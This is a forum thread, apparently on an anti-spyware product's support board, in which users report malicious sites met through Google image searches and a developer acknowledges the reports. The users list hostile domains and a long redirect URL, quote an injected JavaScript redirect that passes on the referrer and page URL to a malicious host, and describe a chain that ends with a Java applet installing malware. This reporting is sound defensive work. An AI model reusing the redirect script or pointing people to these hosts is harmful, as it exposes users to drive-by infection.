New bad link submission.

I found this one trolling around looking at a google image search, go figure. I did report the link on their search, and wanted to add it to the list for Spyware Blaster.

The links below would have gotten me if not for SpySweeper and I knew to kill Firefox with the Task Manager. Trying to restart Firefox was a bit of a pain since it now seems to automatically restore all pages without asking the first time. The next time, it did bring up the dialog page with the pages to restore or not. It was pretty easy to figure which page was up to no good.

Don't click or open the links below.

"antispyware-infection.co.cc/fast-scan"

"pgxyyyoq.cw.cm/in.cgi?2&seoref=http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2F1.bp.blogspot.com%2F_yNwrvgG4JbM%2FSVk2wfBYreI%2FAAAAAAAAAbs%2F3Hj0ogl2GgA%2Fs320%2Fodette.jpg%26imgrefurl%3Dhttp%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%2526page%253D3%26usg%3D__ENyYpL7WFgu7ps1Dr9CFEW-m5Rc%3D%26h%3D320%26w%3D246%26sz%3D20%26hl%3Den%26start%3D0%26sig2%3DsBHzpbuuzruowdgDiYgQdA%26zoom%3D1%26tbnid%3DT7VnTzL3HD4HMM%3A%26tbnh%3D125%26tbnw%3D97%26ei%3De3OdTbWBBaTy0gGF1pHABA%26prev%3D%2Fsearch%253Fq%253DOdette%252BAnnable%2526hl%253Den%2526newwindow%253D1%2526safe%253Doff%2526client%253Dfirefox-a%2526hs%253DGdQ%2526sa%253DX%2526rlz%253D1R1GGGL_en___US357%2526biw%253D1920%2526bih%253D946%2526tbm%253Disch%2526prmd%253Divnsuo0%252C114%26itbs%3D1%26iact%3Dhc%26vpx%3D226%26vpy%3D228%26dur%3D3234%26hovh%3D256%26hovw%3D196%26tx%3D137%26ty%3D136%26oei%3De3OdTbWBBaTy0gGF1pHABA%26page%3D1%26ndsp%3D82%26ved%3D1t%3A429%2Cr%3A29%2Cs%3A0%26biw%3D1920%26bih%3D946&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%26page%3D3&default_keyword=default"

 

I just came across to this bad link. Fortunately my antivirus catched id and privoxy logged its behaviour.

I found it also by searching an image on Google Map, an

The image was linked on
bank.owned-properties.info, which appears to be involved or at least compromised (contacts link are dead).
The images is located on
bank-owned-properties.info/45.php

This is a script that makes a redirect to pgxyyyoq.cw.cm, passing also the referer URL.
<script>var url = "http://pgxyyyoq.cw.cm/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";

That then redirect to sexgoogle.info/TF19 which contains one of those infamous obscured javascript codes

The code then tries to load some Java Applet that should install Crypt.XPACK.Gen.

If I try to call the pgxyyoq script without parameters I land on wolandtraffic.com

To summarize I would consider all the following links as hostile:
pgxyyyoq.cw.cm
sexgoogle.info

These one as suspects:
bank-owned-properties.info
wolandtraffic.com

 

and some more mirrors of the same stuff.

Always while searching for "gasometer wien" in google image, I got attempts to infect from:

rwjhlqjg.cw.cm/

Added .cw.cm in the block list

The compromised site used for the attack is: hariyoanaklaut.com

 

Hi,

Many thanks for the submissions & information. We'll take a look.

Best regards,

-Javacool

 

Is it a safe bet that this was at least partly behind the unusual number of restricted-site additions in the most recent def updates?

 

The Restricted Sites additions in the 4/10/2011 update were actually related to the Lizamoon SQL injection attack that infected numerous websites.